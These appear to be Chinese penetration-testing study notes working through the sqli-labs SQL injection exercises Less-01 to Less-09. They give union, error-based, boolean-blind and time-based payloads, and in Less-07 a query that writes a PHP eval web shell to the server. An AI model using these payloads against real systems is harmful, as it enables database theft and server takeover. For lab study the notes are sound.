[渗透测试]：SQL自动化注入

[渗透测试]：SQL自动化注入

 

自动化注入

 

半自动化

 

burp

 

全自动

 

sqlmap

 

定制化脚本

 

sqli-labs题库

 

Less-01

 

    字符型注入

 

    单引号

 

    ?id=1

 

    ?id=1' and 1=2 union select 1,version(),3 --+

 

Less-02

 

    数字型注入

 

    ?id=-2 union select 1,2,version()

 

Less-03

 

    字符型注入

 

    near ''1'') LIMIT 0,1' at line 1

 

    ')

 

    ?id=1') and 1=2 union select 1,2,version()--+

 

Less-04

 

    字符型注入

 

    ")

 

    ?id=2") and 1=2 union select 1,2,version()--+

 

Less-05

 

    没有回显，有报错

 

    字符型注入

 

    单引号

 

    ?id=3' and updatexml(1,concat(0x5e,version(),0x5e),1)--+

 

Less-06

 

    没有回显，有报错

 

    字符型注入

 

    "

 

    ?id=1" and updatexml(1,concat(0x5e,(select version()),0x5e),1)--+

 

Less-07

 

    没有回显，没有报错

 

    经过代码审计

 

    字符型注入

 

    '))

 

    ?id=2')) union select 1,"<?php@eval(\$_REQUEST[777])?>",3 into outfile "c:\\phpstudy\\www\\1.php"--+

 

Less-08

 

没有回显，没有报错，有布尔类型状态

 

字符型注入

 

'

 

布尔盲注

 

半自动化注入

 

工具：bp

 

*得到数据库名长度

 

?id=2' and length(database())=2 --+

 

抓包

 

 

选择字典

 

start attack

 

 

得到数据库名的长度 8

 

*获取数据库名

 

?id=2' and ascii(substr(database(),1,1))=1--+

 

 

字典

 

第一个变量1-8

 

第二个变量1-128

 

start attack

 

 

Less-09

 

字符型注入，单引号

 

没有回显，没有报错，没有布尔类型状态，有延时

 

半自动化注入

 

*获取数据库长度

 

?id=1' and if(length(database())=1,sleep(5),1)--+

 

抓包

 

添加变量

 

 

字典 0-9

 

 

*获取数据库名

 

抓包

 

 

字典

 

变量1：1-8

 

变量2：1-128

 

 

获取成功